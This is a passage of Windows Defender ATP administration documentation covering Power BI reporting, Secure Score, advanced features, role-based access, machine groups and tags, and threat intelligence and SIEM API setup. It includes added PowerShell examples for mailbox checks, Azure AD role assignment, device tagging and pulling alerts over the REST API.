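# trusted sender is the fix the documentation describes (Mark as Not junk).
$junk = Get-MailboxJunkEmailConfiguration -Identity $Recipient
[pscustomobject]@{
    JunkFilterEnabled = $junk.Enabled
    SenderBlocked     = $junk.BlockedSendersAndDomains -contains $NotificationSender
    SenderTrusted     = $junk.TrustedSendersAndDomains -contains $NotificationSender
} | Format-List

# Check 3: enabled inbox rules that move or delete mail. Rules with no From or
# Subject condition act on every message and are the usual culprit.
Get-InboxRule -Mailbox $Recipient |
    Where-Object { $_.Enabled -and ($_.MoveToFolder -or $_.DeleteMessage) } |
    Select-Object Name, Priority, From, SubjectContainsWords, MoveToFolder, DeleteMessage |
    Format-Table -AutoSize
```

Run it as `.\Check-AlertMail.ps1 -Recipient soc@contoso.com` (constructed address). Because the output is the recipient's own mailbox state, it also documents what was changed if you later add the sender to the trusted list.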

Related topics
Update data retention settings
Enable and create Power BI reports using Windows Defender ATP data
Enable Secure Score security controls
Configure advanced features
Create and build Power BI reports using Windows Defender ATP data
4/22/2019 • 5 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

IMPORTANT
Some information relates to prereleased product which may be substantially modified before it's commercially released.
Microsoft makes no warranties, express or implied, with respect to the information provided here.

TIP
Go to Advanced features in the Settings page to turn on the preview features.

Understand the security status of your organization, including the status of machines, alerts, and investigations
using the Windows Defender ATP reporting feature that integrates with Power BI.
Windows Defender ATP supports the use of Power BI data connectors to enable you to connect and access
Windows Defender ATP data using Microsoft Graph.
Data connectors integrate seamlessly in Power BI, and make it easy for power users to query, shape and combine
data to build reports and dashboards that meet the needs of your organization.
You can easily get started by:
Creating a dashboard on the Power BI service
Building a custom dashboard on Power BI Desktop and tweaking it to fit the visual analytics and reporting
requirements of your organization
You can access these options from Windows Defender Security Center. Both the Power BI service and Power BI
Desktop are supported.

Create a Windows Defender ATP dashboard on Power BI service


Windows Defender ATP makes it easy to create a Power BI dashboard by providing an option straight from the
portal.
1. In the navigation pane, select Settings > Power BI reports.
2. Click Create dashboard.
You'll see a notification that things are being loaded.

NOTE
Loading your data in the Power BI service can take a few minutes.

3. Specify the following details:


extensionDataSourceKind: WDATPConnector
extensionDataSourcePath: WDATPConnector
Authentication method: OAuth2
4. Click Sign in. If this is the first time you’re using Power BI with Windows Defender ATP, you’ll need to
sign in and give consent to Windows Defender ATP Power BI app. By providing consent, you’re allowing
Windows Defender ATP Power BI to sign in and read your profile, access your data, and be used for report
refresh.

5. Click Accept. Power BI service will start downloading your Windows Defender ATP data from Microsoft
Graph. After a successful login, you'll see a notification that data is being imported:
NOTE
Depending on the number of onboarded machines, loading your data in the Power BI service can take several
minutes. A larger number of machines might take longer to load.

When importing data is completed and the dataset is ready, you'll see the following notification:

6. Click View dataset to explore your data.


For more information, see Create a Power BI dashboard from a report.

Create a Power BI dashboard from the Power BI portal


1. Log in to Power BI.
2. Click Get Data.
3. Select Microsoft AppSource > My Organization > Get.

4. In the AppSource window, select Apps and search for Windows Defender Advanced Threat Protection.
5. Click Get it now.
6. Specify the following details:
extensionDataSourceKind: WDATPConnector
extensionDataSourcePath: WDATPConnector
Authentication method: OAuth2

7. Click Sign in. If this is the first time you’re using Power BI with Windows Defender ATP, you’ll need to
sign in and give consent to Windows Defender ATP Power BI app. By providing consent, you’re allowing
Windows Defender ATP Power BI to sign in and read your profile, access your data, and be used for report
refresh.
8. Click Accept. Power BI service will start downloading your Windows Defender ATP data from Microsoft
Graph. After a successful login, you'll see a notification that data is being imported:

NOTE
Depending on the number of onboarded machines, loading your data in the Power BI service can take several
minutes. A larger number of machines might take longer to load.

When importing data is completed and the dataset is ready, you'll see the following notification:

9. Click View dataset to explore your data.

Build a custom Windows Defender ATP dashboard in Power BI Desktop

You can create a custom dashboard in Power BI Desktop to create visualizations that cater to the specific views
that your organization requires.
Before you begin
1. Make sure you use Power BI Desktop June 2017 and above. Download the latest version.
2. In the Windows Defender Security Center navigation pane, select Settings > Power BI reports.

3. Click Download connector to download the WDATPPowerBI.zip file and extract it.

4. Create a new directory Microsoft Power BI Desktop\Custom Connectors under the user's Documents folder.
5. Copy WDATPDataConnector.mez from the zip to the directory you just created.
6. Open Power BI Desktop.
7. Click File > Options and settings > Custom data connectors.
8. Select New table and matrix visuals and Custom data connectors and click OK.

NOTE
If you are using Power BI Desktop July 2017 version (or later), you won't need to select New table and matrix
visuals. You'll only need to select Custom data connectors.
9. Restart Power BI Desktop.

Customize the Windows Defender ATP Power BI dashboard


After completing the steps in the Before you begin section, you can proceed with building your custom
dashboard.
1. Open WDATPPowerBI.pbit from the zip with Power BI Desktop.
2. If this is the first time you’re using Power BI with Windows Defender ATP, you’ll need to sign in and give
consent to Windows Defender ATP Power BI app. By providing consent, you’re allowing Windows
Defender ATP Power BI to sign in and read your profile, and access your data.
3. Click Accept. Power BI Desktop will start downloading your Windows Defender ATP data from Microsoft
Graph. When all data has been downloaded, you can proceed to customize your reports.

Mashup Windows Defender ATP data with other data sources


You can use Power BI Desktop to analyse data from Windows Defender ATP and mash that data up with other
data sources to gain better security perspective in your organization.
1. In Power BI Desktop, in the Home ribbon, click Get data and search for Windows Defender Advanced
Threat Protection.

2. Click Connect.
3. On the Preview Connector windows, click Continue.
4. If this is the first time you’re using Power BI with Windows Defender ATP, you’ll need to sign in and give
consent to Windows Defender ATP Power BI app. By providing consent, you’re allowing Windows
Defender ATP Power BI to sign in and read your profile, and access your data.

5. Click Accept. Power BI Desktop will start downloading your Windows Defender ATP data from Microsoft
Graph. When all data has been downloaded, you can proceed to customize your reports.
6. In the Navigator dialog box, select the Windows Defender ATP feeds you'd like to download and use in
your reports and click Load. Data will start to be downloaded from the Microsoft Graph.

7. Load other data sources by clicking Get data item in the Home ribbon, and select another data source.
8. Add visuals and select fields from the available data sources.

Using the Power BI reports


There are a couple of tabs on the report that's generated:
Machine and alerts
Investigation results and action center
Secure Score
In general, if you know of a specific threat name, CVE, or KB, you can identify machines with unpatched
vulnerabilities that might be leveraged by threats. This report also helps you determine whether machine-level
mitigations are configured correctly on the machines and prioritize those that might need attention.

Related topic
Beta Create custom Power BI reports
Enable Secure Score security controls
4/5/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Set the baselines for calculating the score of Windows Defender security controls on the Secure Score dashboard.
If you use third-party solutions, consider excluding the corresponding controls from the calculations.

NOTE
Changes might take up to a few hours to reflect on the dashboard.

1. In the navigation pane, select Settings > Secure Score.


2. Select the security control, then toggle the setting between On and Off.
3. Click Save preferences.

Related topics
View the Secure Score dashboard
Update data retention settings for Windows Defender ATP
Configure alert notifications in Windows Defender ATP
Enable and create Power BI reports using Windows Defender ATP data
Configure advanced features in Windows Defender ATP
Configure advanced features in Windows Defender ATP
5/2/2019 • 5 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)


Depending on the Microsoft security products that you use, some advanced features might be available for you
to integrate Windows Defender ATP with.
Use the following advanced features to get better protected from potentially malicious files and gain better
insight during security investigations:

Automated investigation
When you enable this feature, you'll be able to take advantage of the automated investigation and remediation
features of the service. For more information, see Automated investigations.

Auto-resolve remediated alerts


For tenants created on or after Windows 10, version 1809, the automated investigations capability is configured
by default to resolve alerts where the automated analysis result status is "No threats found" or "Remediated". If
you don't want alerts auto-resolved, you'll need to manually turn off the feature.

TIP
For tenants created prior to that version, you'll need to manually turn this feature on from the Advanced features page.

NOTE
The result of the auto-resolve action may influence the Machine risk level calculation which is based on the active alerts
found on a machine.
If a security operations analyst manually sets the status of an alert to "In progress" or "Resolved" the auto-resolve
capability will not overwrite it.

Block file
This feature is only available if your organization uses Windows Defender Antivirus as the active antimalware
solution and the cloud-based protection feature is enabled; see Block files in your network for more details.
If your organization satisfies these conditions, the feature is enabled by default. This feature enables you to block
potentially malicious files in your network. Blocking a file prevents it from being read, written, or executed on
machines in your organization.

Show user details


When you enable this feature, you'll be able to see user details stored in Azure Active Directory including a
user's picture, name, title, and department information when investigating user account entities. You can find
user account information in the following views:
Security operations dashboard
Alert queue
Machine details page
For more information, see Investigate a user account.

Skype for Business integration


Enabling the Skype for Business integration gives you the ability to communicate with users using Skype for
Business, email, or phone. This can be handy when you need to communicate with the user and mitigate risks.

NOTE
When a machine is being isolated from the network, there's a pop-up where you can choose to enable Outlook and Skype
communications which allows communications to the user while they are disconnected from the network. This setting
applies to Skype and Outlook communication when machines are in isolation mode.

Azure Advanced Threat Protection integration


The integration with Azure Advanced Threat Protection allows you to pivot directly into another Microsoft
Identity security product. Azure Advanced Threat Protection augments an investigation with additional insights
about a suspected compromised account and related resources. By enabling this feature, you'll enrich the
machine-based investigation capability by pivoting across the network from an identity point of view.

NOTE
You'll need to have the appropriate license to enable this feature.

Enable the Windows Defender ATP integration from the Azure ATP portal
To receive contextual machine integration in Azure ATP, you'll also need to enable the feature in the Azure ATP
portal.
1. Log in to the Azure portal with a Global Administrator or Security Administrator role.
2. Click Create a workspace or use your primary workspace.
3. Toggle the Integration setting to On and click Save.
When you complete the integration steps on both portals, you'll be able to see relevant alerts in the machine
details or user details page.

Office 365 Threat Intelligence connection


This feature is only available if you have an active Office 365 E5 or the Threat Intelligence add-on. For more
information, see the Office 365 Enterprise E5 product page.
When you enable this feature, you'll be able to incorporate data from Office 365 Advanced Threat Protection
into Windows Defender Security Center to conduct a holistic security investigation across Office 365 mailboxes
and Windows machines.
NOTE
You'll need to have the appropriate license to enable this feature.

To receive contextual machine integration in Office 365 Threat Intelligence, you'll need to enable the Windows
Defender ATP settings in the Security & Compliance dashboard. For more information, see Office 365 Threat
Intelligence overview.

Microsoft Threat Experts


Of the two Microsoft Threat Experts components, targeted attack notification is in general availability, while the
experts-on-demand capability is still in preview. You can only use the experts-on-demand capability if you have
applied for preview and your application has been approved. You can receive targeted attack notifications from
Microsoft Threat Experts through your Windows Defender ATP portal's alerts dashboard and via email if you
configure it.

NOTE
The Microsoft Threat Experts capability in Windows Defender ATP is available with an E5 license for Enterprise Mobility +
Security.

Microsoft Cloud App Security


Enabling this setting forwards Windows Defender ATP signals to Microsoft Cloud App Security to provide
deeper visibility into cloud application usage. Forwarded data is stored and processed in the same location as
your Cloud App Security data.

NOTE
This feature is available with an E5 license for Enterprise Mobility + Security on machines running Windows 10 version
1809 or later.

Azure Information Protection


Turning this setting on forwards signals to Azure Information Protection, giving data owners and administrators
visibility into protected data on onboarded machines and machine risk ratings.

Microsoft Intune connection


This feature is only available if you have an active Microsoft Intune (Intune) license.
When you enable this feature, you'll be able to share Windows Defender ATP device information to Intune and
enhance policy enforcement.

NOTE
You'll need to enable the integration on both Intune and Windows Defender ATP to use this feature.

Preview features
Learn about new features in the Windows Defender ATP preview release and be among the first to try
upcoming features by turning on the preview experience.
You'll have access to upcoming features which you can provide feedback on to help improve the overall
experience before features are generally available.

Enable advanced features


1. In the navigation pane, select Preferences setup > Advanced features.
2. Select the advanced feature you want to configure and toggle the setting between On and Off.
3. Click Save preferences.

Related topics
Update data retention settings
Configure alert notifications
Enable and create Power BI reports using Windows Defender ATP data
Enable Secure Score security controls
Use basic permissions to access the portal
4/8/2019 • 2 minutes to read

Applies to:
Azure Active Directory
Windows Defender Advanced Threat Protection (Windows Defender ATP)


Refer to the instructions below to use basic permissions management.


You can use either of the following:
Azure PowerShell
Azure Portal
For granular control over permissions, switch to role-based access control.

Assign user access using Azure PowerShell


You can assign users with one of the following levels of permissions:
Full access (Read and Write)
Read-only access
Before you begin
Install Azure PowerShell. For more information, see How to install and configure Azure PowerShell. The cmdlets below belong to the MSOnline module (Connect-MsolService, Add-MsolRoleMember).

NOTE
You need to run the PowerShell cmdlets in an elevated command-line.

Connect to your Azure Active Directory. For more information, see Connect-MsolService.
Full access
Users with full access can log in, view all system information and resolve alerts, submit files for deep analysis, and
download the onboarding package. Assigning full access rights requires adding the users to the "Security
Administrator" or "Global Administrator" AAD built-in roles.
Read only access
Users with read only access can log in, view all alerts, and related information. They will not be able to change
alert states, submit files for deep analysis or perform any state changing operations. Assigning read only access
rights requires adding the users to the "Security Reader" AAD built-in role.
Use the following steps to assign security roles:
For read and write access, assign users to the security administrator role by using the following command:

Add-MsolRoleMember -RoleName "Security Administrator" -RoleMemberEmailAddress "secadmin@Contoso.onmicrosoft.com"

For read only access, assign users to the security reader role by using the following command:

Add-MsolRoleMember -RoleName "Security Reader" -RoleMemberEmailAddress "reader@Contoso.onmicrosoft.com"

For more information, see Add or remove group memberships.
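The following PowerShell script is an added example, not code from the original page or from Microsoft: it wraps the two Add-MsolRoleMember commands above in a function that skips users who already hold the role and returns the resulting membership so the change is verified rather than assumed. It assumes the MSOnline module is installed and that the account running it holds Global Administrator or Security Administrator; the user names are placeholders.

```powershell
# Added example (not from the original page): assign Windows Defender ATP portal
# access through the Azure AD built-in roles with the MSOnline module, then read
# the membership back so the change is verified rather than assumed.
# Assumes the MSOnline module is installed; the user names are placeholders.
Import-Module MSOnline
Connect-MsolService   # prompts for the credentials of a Global/Security Administrator

$fullAccessUsers = @('secadmin@Contoso.onmicrosoft.com')
$readOnlyUsers   = @('reader@Contoso.onmicrosoft.com')

function Add-WdatpPortalAccess {
    param(
        [Parameter(Mandatory)] [string[]] $Users,
        [Parameter(Mandatory)]
        [ValidateSet('Security Administrator', 'Security Reader')] [string] $RoleName
    )
    $roleId  = (Get-MsolRole -RoleName $RoleName).ObjectId
    $current = Get-MsolRoleMember -RoleObjectId $roleId |
        Select-Object -ExpandProperty EmailAddress
    foreach ($user in $Users) {
        if ($current -contains $user) {
            Write-Host "$user is already a member of '$RoleName', skipping"
            continue
        }
        Add-MsolRoleMember -RoleName $RoleName -RoleMemberEmailAddress $user
        Write-Host "Added $user to '$RoleName'"
    }
    # Return the post-change membership so the caller can confirm it.
    Get-MsolRoleMember -RoleObjectId $roleId | Select-Object DisplayName, EmailAddress
}

Add-WdatpPortalAccess -Users $fullAccessUsers -RoleName 'Security Administrator'
Add-WdatpPortalAccess -Users $readOnlyUsers   -RoleName 'Security Reader'
```

Keep in mind that Security Administrator and Security Reader are tenant-wide Azure AD roles: membership grants rights far beyond the Windows Defender ATP portal. If you only need to scope portal access, switch to role-based access control as described in the next topic.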

Assign user access using the Azure portal


For more information, see Assign administrator and non-administrator roles to users with Azure Active Directory.

Related topic
Manage portal access using RBAC

Manage portal access using role-based access control
4/22/2019

Applies to:
Azure Active Directory
Office 365
Windows Defender Advanced Threat Protection (Windows Defender ATP)

Using role-based access control (RBAC), you can create roles and groups within your security operations team
to grant appropriate access to the portal. Based on the roles and groups you create, you have fine-grained
control over what users with access to the portal can see and do.
Large geo-distributed security operations teams typically adopt a tier-based model to assign and authorize
access to security portals. Typical tiers include the following three levels:

TIER     DESCRIPTION

Tier 1   Local security operations team / IT team. This team usually triages and
         investigates alerts contained within their geolocation and escalates to
         Tier 2 in cases where an active remediation is required.

Tier 2   Regional security operations team. This team can see all the machines
         for their region and perform remediation actions.

Tier 3   Global security operations team. This team consists of security experts
         and is authorized to see and perform all actions from the portal.

Windows Defender ATP RBAC is designed to support your tier- or role-based model of choice and gives you
granular control over what roles can see, machines they can access, and actions they can take. The RBAC
framework is centered around the following controls:
Control who can take specific action
Create custom roles and control what Windows Defender ATP capabilities they can access with
granularity.
Control who can see information on specific machine group or groups
Create machine groups by specific criteria such as names, tags, domains, and others, then grant role
access to them using a specific Azure Active Directory (Azure AD) user group.
To implement role-based access, you'll need to define admin roles, assign corresponding permissions, and
assign Azure AD user groups to the roles.
Before you begin
Before using RBAC, it's important that you understand the roles that can grant permissions and the
consequences of turning on RBAC.

WARNING
Before enabling the feature, it's important that you have a Global Administrator role or Security Administrator role in
Azure AD and that you have your Azure AD groups ready to reduce the risk of being locked out of the portal.

When you first log in to Windows Defender Security Center, you're granted either full access or read only
access. Full access rights are granted to users with Security Administrator or Global Administrator roles in
Azure AD. Read only access is granted to users with a Security Reader role in Azure AD.
Someone with the Windows Defender ATP Global administrator role has unrestricted access to all machines,
regardless of their machine group association and the Azure AD user group assignments.

WARNING
Initially, only those with Azure AD Global Administrator or Security Administrator rights will be able to create and assign
roles in Windows Defender Security Center, therefore, having the right groups ready in Azure AD is important.
Turning on role-based access control will cause users with read-only permissions (for example, users assigned
to Azure AD Security reader role) to lose access until they are assigned to a role.
Users with admin permissions are automatically assigned the default built-in Windows Defender ATP global administrator
role with full permissions. After opting in to use RBAC, you can assign additional users that are not Azure AD Global or
Security Administrators to the Windows Defender ATP global administrator role.
After opting in to use RBAC, you cannot revert to the initial roles as when you first logged into the portal.

Related topic
Create and manage machine groups in Windows Defender ATP

Create and manage roles for role-based access control
4/5/2019

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

Create roles and assign the role to an Azure Active Directory group
The following steps guide you on how to create roles in Windows Defender Security Center. It assumes
that you have already created Azure Active Directory user groups.
1. In the navigation pane, select Settings > Roles.
2. Click Add role.
3. Enter the role name, description, and permissions you'd like to assign to the role.
Role name
Description
Permissions
View data - Users can view information in the portal.
Alerts investigation - Users can manage alerts, initiate automated investigations,
collect investigation packages, manage machine tags, and export machine timeline.
Active remediation actions - Users can take response actions and approve or dismiss
pending remediation actions.
Manage portal system settings - Users can configure storage settings, SIEM and
threat intel API settings (applies globally), advanced settings, automated file
uploads, roles and machine groups.

NOTE
This setting is only available in the Windows Defender ATP administrator (default) role.

Manage security settings - Users can configure alert suppression settings,
manage allowed/blocked lists for automation, manage folder exclusions for
automation, onboard and offboard machines, and manage email notifications.
4. Click Next to assign the role to an Azure AD group.
5. Use the filter to select the Azure AD group that you'd like to add to this role.
6. Click Save and close.
7. Apply the configuration settings.
After creating roles, you'll need to create a machine group and provide access to the machine group by
assigning it to a role that you just created.

Edit roles
1. Select the role you'd like to edit.
2. Click Edit.
3. Modify the details or the groups that are assigned to the role.
4. Click Save and close.

Delete roles
1. Select the role you'd like to delete.
2. Click the drop-down button and select Delete role.

Related topic
Use basic permissions to access the portal
Create and manage machine groups

Create and manage machine groups in Windows Defender ATP
4/5/2019

Applies to:
Azure Active Directory
Office 365
Windows Defender Advanced Threat Protection (Windows Defender ATP)
In an enterprise scenario, security operation teams are typically assigned a set of machines. These
machines are grouped together based on a set of attributes such as their domains, computer names, or
designated tags.
In Windows Defender ATP, you can create machine groups and use them to:
Limit access to related alerts and data to specific Azure AD user groups with assigned RBAC roles
Configure different auto-remediation settings for different sets of machines

TIP
For a comprehensive look into RBAC application, read: Is your SOC running flat with RBAC.

As part of the process of creating a machine group, you'll:


Set the automated remediation level for that group. For more information on remediation levels, see
Use Automated investigation to investigate and remediate threats.
Specify the matching rule that determines which machines belong to the group based on the
machine name, domain, tags, and OS platform. If a machine also matches other groups, it is
added only to the highest ranked machine group.
Select the Azure AD user group that should have access to the machine group.
Rank the machine group relative to other groups after it is created.

NOTE
A machine group is accessible to all users if you don’t assign any Azure AD groups to it.

Create a machine group


1. In the navigation pane, select Settings > Machine groups.
2. Click Add machine group.
3. Enter the group name and automation settings and specify the matching rule that determines
which machines belong to the group.
Machine group name
Automation level
Semi - require approval for any remediation
Semi - require approval for non-temp folders remediation
Semi - require approval for core folders remediation
Full - remediate threats automatically

NOTE
For more information on automation levels, see Understand the Automated investigation
flow.

Description
Members

TIP
If you want to group machines by organizational unit, you can configure the registry key for the group
affiliation. For more information on device tagging, see Manage machine group and tags.

4. Preview several machines that will be matched by this rule. If you are satisfied with the rule, click
the Access tab.
5. Assign the user groups that can access the machine group you created.

NOTE
You can only grant access to Azure AD user groups that have been assigned to RBAC roles.

6. Click Close. The configuration changes are applied.

Manage machine groups


You can promote or demote the rank of a machine group so that it is given higher or lower priority
during matching. When a machine is matched to more than one group, it is added only to the highest
ranked group. You can also edit and delete groups.

WARNING
Deleting a machine group may affect email notification rules. If a machine group is configured under an email
notification rule, it will be removed from that rule. If the machine group is the only group configured for an email
notification, that email notification rule will be deleted along with the machine group.

By default, machine groups are accessible to all users with portal access. You can change the default
behavior by assigning Azure AD user groups to the machine group.
Machines that are not matched to any groups are added to the Ungrouped machines (default) group. You
cannot change the rank of this group or delete it. However, you can change the remediation level of this
group, and define the Azure AD user groups that can access this group.

NOTE
Applying changes to machine group configuration may take up to several minutes.

Related topic
Manage portal access using role-based access control
Get list of tenant machine groups using Graph API
Create and manage machine tags
4/5/2019

Add tags on machines to create a logical group affiliation. Machine group affiliation can represent geographic
location, specific activity, importance level and others.
You can create machine groups in the context of role-based access (RBAC) to control who can take specific action
or who can see information on a specific machine group or groups by assigning the machine group to a user
group. For more information, see Manage portal access using role-based access control.
You can also use machine groups to assign specific remediation levels to apply during automated investigations.
For more information, see Create and manage machine groups.
In an investigation, you can filter the Machines list to just specific machine groups by using the Groups filter.
Machine tags support proper mapping of the network, enabling you to attach different tags to capture context and
to enable dynamic list creation as part of an incident.
You can add tags on machines using the following ways:
By setting a registry key value
By using the portal

Add machine tags by setting a registry key value


Add tags on machines which can be used as a filter in Machines list view. You can limit the machines in the list by
selecting the Tag filter on the Machines list.

NOTE
Applicable only on the following machines:
Windows 10, version 1709 or later
Windows Server, version 1803 or later
Windows Server 2016
Windows Server 2012 R2

Machines with similar tags can be handy when you need to apply contextual action on a specific list of machines.
Use the following registry key entry to add a tag on a machine:
Registry key: HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection\DeviceTagging
Registry value name: Group (type: string, REG_SZ)

NOTE
The device tag is part of the machine information report that's generated once a day. As an alternative, you may
restart the endpoint, which triggers a new machine information report.
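The script below is an added PowerShell example, not code from the original page or from Microsoft. It writes the DeviceTagging\Group value described above, creating the key if it does not exist, and reads it back; the tag value 'Finance-EMEA' is a placeholder. It must run elevated because the key lives under HKLM.

```powershell
# Added example (not from the original page): set the Windows Defender ATP device
# tag through the DeviceTagging policy key and read it back. Run elevated.
# The tag value 'Finance-EMEA' is a placeholder.
$tagKey  = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection\DeviceTagging'
$tagName = 'Group'

function Set-WdatpDeviceTag {
    param([Parameter(Mandatory)] [string] $Tag)
    if (-not (Test-Path -Path $tagKey)) {
        # -Force also creates any missing parent keys.
        New-Item -Path $tagKey -Force | Out-Null
    }
    # The page specifies a string (REG_SZ) value named Group.
    Set-ItemProperty -Path $tagKey -Name $tagName -Value $Tag -Type String
}

function Get-WdatpDeviceTag {
    if (-not (Test-Path -Path $tagKey)) { return $null }
    (Get-ItemProperty -Path $tagKey -Name $tagName -ErrorAction SilentlyContinue).$tagName
}

Set-WdatpDeviceTag -Tag 'Finance-EMEA'
Get-WdatpDeviceTag
```

The tag only shows up in the portal after the next daily machine information report, or after a restart, so a read-back of the registry value confirms the local write, not that the portal has picked it up yet. Because the value sits under HKLM\SOFTWARE\Policies, the same write can be delivered by whatever tool already manages registry policy on your endpoints.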

Add machine tags using the portal


Dynamic context capturing is achieved using tags. By tagging machines, you can keep track of individual machines
in your organization. After adding tags on machines, you can apply the Tags filter on the Machines list to get a
narrowed list of machines with the tag.
1. Select the machine that you want to manage tags on. You can select or search for a machine from any of the
following views:
Security operations dashboard - Select the machine name from the Top machines with active alerts
section.
Alerts queue - Select the machine name beside the machine icon from the alerts queue.
Machines list - Select the machine name from the list of machines.
Search box - Select Machine from the drop-down menu and enter the machine name.
You can also get to the alert page through the file and IP views.
2. Open the Actions menu and select Manage tags.

3. Enter tags on the machine. To add more tags, click the + icon.
4. Click Save and close.
Tags are added to the machine view and will also be reflected on the Machines list view. You can then use
the Tags filter to see the relevant list of machines.
Manage machine tags
You can manage tags from the Actions button or by selecting a machine from the Machines list and opening the
machine details panel.
Add machine tags using APIs
For more information, see Add or remove machine tags API.
Enable the custom threat intelligence API in Windows Defender ATP
4/5/2019

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

Before you can create custom threat intelligence (TI) using REST API, you'll need to set up the custom threat
intelligence application through Windows Defender Security Center.
1. In the navigation pane, select Settings > Threat intel.

2. Select Enable threat intel API. This activates the Azure Active Directory application setup sections
with pre-populated values.
3. Copy the individual values or select Save details to file to download a file that contains all the values.
WARNING
The client secret is only displayed once. Make sure you keep a copy of it in a safe place.
For more information about getting a new secret see, Learn how to get a new secret.

4. Select Generate tokens to get an access and refresh token.


You’ll need to use the access token in the Authorization header when doing REST API calls.

Related topics
Understand threat intelligence concepts
Create custom alerts using the threat intelligence API
PowerShell code examples for the custom threat intelligence API
Python code examples for the custom threat intelligence API
Experiment with custom threat intelligence alerts
Troubleshoot custom threat intelligence issues
Enable SIEM integration in Windows Defender ATP
4/5/2019

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

Enable security information and event management (SIEM) integration so you can pull alerts from Windows
Defender Security Center using your SIEM solution or by connecting directly to the alerts REST API.

Prerequisites
The user who activates the setting must have permissions to create an app in Azure Active Directory (AAD).
This is typically someone with a Global administrator role.
During the initial activation, a pop-up screen is displayed for credentials to be entered. Make sure that you
allow pop-ups for this site.

Enabling SIEM integration


1. In the navigation pane, select Settings > SIEM.

TIP
If you encounter an error when trying to enable the SIEM connector application, check the pop-up blocker
settings of your browser. It might be blocking the new window being opened when you enable the capability.

2. Select Enable SIEM integration. This activates the SIEM connector access details section with pre-
populated values and an application is created under your Azure Active Directory (AAD) tenant.

WARNING
The client secret is only displayed once. Make sure you keep a copy of it in a safe place.
For more information about getting a new secret see, Learn how to get a new secret.
3. Choose the SIEM type you use in your organization.

NOTE
If you select HP ArcSight, you'll need to save these two configuration files:
WDATP-connector.jsonparser.properties
WDATP-connector.properties

If you want to connect directly to the alerts REST API through programmatic access, choose Generic
API.
4. Copy the individual values or select Save details to file to download a file that contains all the values.
5. Select Generate tokens to get an access and refresh token.

NOTE
You'll need to generate a new Refresh token every 90 days.

You can now proceed with configuring your SIEM solution or connecting to the alerts REST API through
programmatic access. You'll need to use the tokens when configuring your SIEM solution to allow it to receive
alerts from Windows Defender Security Center.
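The script below is an added PowerShell example, not code from the original page or from Microsoft, and it serves both the custom threat intelligence API topic above and this SIEM topic, since both hand you the same kind of Azure AD application (tenant ID, application ID, client secret) and both expect the access token in the Authorization header. It obtains an access token for the application created by Enable SIEM integration and pulls alerts from the alerts REST API (the Generic API option). Assumptions: the token endpoint, the resource value, the alerts endpoint and the alert field names are taken from the related topics Pull Windows Defender ATP alerts using REST API and Windows Defender ATP alert API fields, not from this page; the alerts host is region specific (-eu, -uk, -us) and is shown for the EU datacenter. Credentials are read from environment variables so the client secret is never stored in the script.

```powershell
# Added example (not from the original page): acquire an OAuth2 access token for the
# SIEM connector application that "Enable SIEM integration" created in Azure AD and
# pull alerts from the alerts REST API ("Generic API"). The endpoints, resource value
# and alert field names are assumptions taken from the related REST API topics; the
# alerts host is region specific and is given here for EU.
$tenantId  = $env:WDATP_TENANT_ID
$appId     = $env:WDATP_APP_ID
$appSecret = $env:WDATP_APP_SECRET
$tokenUri  = "https://login.windows.net/$tenantId/oauth2/token"
$alertsUri = 'https://wdatp-alertexporter-eu.windows.com/api/alerts'

function Get-WdatpAccessToken {
    # Client credentials flow: no user, no refresh token to rotate, but the client
    # secret must be protected like a password.
    $body = @{
        resource      = 'https://graph.windows.net'
        client_id     = $appId
        client_secret = $appSecret
        grant_type    = 'client_credentials'
    }
    $resp = Invoke-RestMethod -Method Post -Uri $tokenUri -Body $body -ErrorAction Stop
    # expires_in is in seconds; cache the token until shortly before expiry rather
    # than requesting a new one per call.
    [pscustomobject]@{
        Token     = $resp.access_token
        ExpiresAt = (Get-Date).AddSeconds([int]$resp.expires_in - 60)
    }
}

function Get-WdatpAlerts {
    param(
        [Parameter(Mandatory)] [datetime] $SinceUtc,
        [Parameter(Mandatory)] [string]   $Token
    )
    $since   = $SinceUtc.ToUniversalTime().ToString('yyyy-MM-ddTHH:mm:ss.fffZ')
    $headers = @{ Authorization = "Bearer $Token" }
    Invoke-RestMethod -Method Get -Uri "${alertsUri}?sinceTimeUtc=$since" `
        -Headers $headers -ErrorAction Stop
}

$auth   = Get-WdatpAccessToken
$alerts = Get-WdatpAlerts -SinceUtc (Get-Date).AddHours(-24) -Token $auth.Token
$alerts | Select-Object AlertTime, Severity, AlertTitle, ComputerDnsName | Format-Table -AutoSize
```

Because the script mints a fresh access token on every run with the client secret, the 90-day refresh token rotation the note above mentions does not apply to it; what you must manage instead is the secret itself, which the portal shows only once and which should live in a secret store rather than in the SIEM configuration file.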
Integrate Windows Defender ATP with IBM QRadar
You can configure IBM QRadar to collect alerts from Windows Defender ATP. For more information, see IBM
Knowledge Center.

Related topics
Configure Splunk to pull Windows Defender ATP alerts
Configure HP ArcSight to pull Windows Defender ATP alerts
Windows Defender ATP alert API fields
Pull Windows Defender ATP alerts using REST API
Troubleshoot SIEM tool integration issues
Manage suppression rules
4/22/2019

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

There might be scenarios where you need to suppress alerts from appearing in the portal. You can create
suppression rules for specific alerts that are known to be innocuous such as known tools or processes in your
organization. For more information on how to suppress alerts, see Suppress alerts.
You can view a list of all the suppression rules and manage them in one place. You can also turn an alert
suppression rule on or off.

Turn a suppression rule on or off


1. In the navigation pane, select Settings > Alert suppression. The list of suppression rules that users in your
organization have created is displayed.
2. Select a rule by clicking on the check-box beside the rule name.
3. Click Turn rule on or Turn rule off.

View details of a suppression rule


1. In the navigation pane, select Settings > Alert suppression. The list of suppression rules that users in your
organization have created is displayed.
2. Click on a rule name. Details of the rule are displayed. You'll see the rule details such as status, scope, action,
number of matching alerts, created by, and date when the rule was created. You can also view associated
alerts and the rule conditions.

Related topics
Manage alerts
Manage automation allowed/blocked lists
4/16/2019

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

Create a rule to control which entities are automatically incriminated or exonerated during Automated
investigations.
Entities added to the allowed list are considered safe and will not be analyzed during Automated investigations.
Entities added to the blocked list are considered malicious and will be remediated during Automated
